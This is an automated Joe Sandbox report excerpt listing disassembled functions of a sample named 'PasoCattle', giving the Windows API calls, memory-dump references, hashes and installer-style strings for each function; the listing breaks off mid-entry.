                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 415043291-0
                                                                                                                                                                      • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                      • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                      • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                      • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                      • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                      • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                      • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                      • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                      • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                      • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                      • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                        • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4115351271-0
                                                                                                                                                                      • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                      • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                      • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                      • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                      • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                      • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                      • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                      • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                      • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                      • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                      • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                      • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                      • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                      • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                      • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                      APIs
                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2492992576-0
                                                                                                                                                                      • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                      • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                      • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                      • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                      • String ID: $ @$M$N
                                                                                                                                                                      • API String ID: 1638840714-3479655940
                                                                                                                                                                      • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                      • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                      • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                      • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                      APIs
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                      • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                      • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                      • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                      • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                      Strings
                                                                                                                                                                      • ptF, xrefs: 00406D1A
                                                                                                                                                                      • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                      • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                      • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                      • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                      • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                      • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                      • \*.*, xrefs: 00406D2F
                                                                                                                                                                      • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                      • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                      • API String ID: 2035342205-1650287579
                                                                                                                                                                      • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                      • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                      • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                      • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                      • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                      • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                      • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                      • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                      • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                      • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                        • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
